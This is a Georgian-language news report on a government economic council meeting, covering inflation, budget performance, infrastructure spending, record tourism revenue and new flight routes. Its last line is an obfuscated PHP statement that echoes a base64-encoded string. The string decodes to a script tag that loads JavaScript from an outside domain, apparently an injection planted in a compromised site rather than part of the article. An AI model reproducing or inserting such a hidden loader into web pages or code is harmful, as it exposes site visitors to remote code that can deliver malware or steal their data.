celsiusi
ავერსი საქკაბელი

მთავრობის ადმინისტრაციის ინფორმაციით, პრემიერ-მინისტრის ირაკლი ღარიბაშვილის ხელმძღვანელობით ეკონომიკური საბჭოს სხდომა გაიმართა. უწყების ცნობითვე, სხდომაზე ეკონომიკის მიმართულებით ქვეყანაში არსებული დადებითი ტენდენციები მიმოიხილეს.

“განსახილველ საკითხებს შორის იყო ინფლაციის დაბალი დონე და ბიუჯეტის შესრულების დინამიკა. როგორც ფინანსთა მინისტრმა ლაშა ხუციშვილმა აღნიშნა,  ივლისში წლიურმა ინფლაციამ 0.3 პროცენტი შეადგინა, 2023 წლის 6 თვის მაჩვენებლების მიხედვით კი ბიუჯეტი გადაჭარბებით შესრულდა”,-აცხადებენ ადმინისტრაციაში.

მთავრობის მეთაურმა რეგიონებში ინფრასტრუქტურული პროექტების მიმდინარეობის შესახებ მოისმინა ინფორმაცია. როგორც რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა ირაკლი ქარსელაძემ აღნიშნა, სამინისტრომ 2023 წლის 6 თვის სახელმწიფო ბიუჯეტი 13.5%-ის ანუ 1 331.1 მლნ ლარის გადაჭარბებით შეასრულა.

ადმინისტრაციის ინფორმაციითვე, განსახილველ საკითხებს შორის იყო ტურიზმის მიმართულებით არსებული დადებითი ტენდენციები. 

“როგორც ვიცე-პრემიერმა, ეკონომიკისა და მდგრადი განვითარების მინისტრმა ლევან დავითაშვილმა აღნიშნა, 2023 წლის I-II კვარტალში მოგზაურობიდან მიღებულმა შემოსავალმა 2019 წლის მაჩვენებელს გადააჭარბა და რეკორდული მაჩვენებელი დაფიქსირდა - 1,804,529,935 აშშ. დოლარი, რაც 2019 წლის ანალოგიურ მაჩვენებლის 123.9% აღდგენაა. 2022 წელთან შედარებით მოგზაურობიდან შემოსავლები 57.9%-ით არის გაზრდილი.

ასევე განიხილეს ახალი ავიამიმართულებების დამატებისა და ჩინეთთან ფრენების ინტენსივობის გაზრდის შესაძლებლობები. აღინიშნა, რომ სხვადასხვა ქვეყანასთან ფრენების ინტენსივობის გაზრდა და ახალი ავიამიმართულებების დამატება ხელს შეუწყობს ქვეყანაში ტურიზმისა თუ ავიაციის სექტორის განვითარებას.

სხდომაზე მსხვილი ეკონომიკური პროექტების მიმდინარეობასა და ამ მიმართულებით სამომავლოდ გადასადგმელ ნაბიჯებზე იმსჯელეს”,- წერია ადმინისტრაციის მიერ გავრცელებულ ინფორმაციაში.

192
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");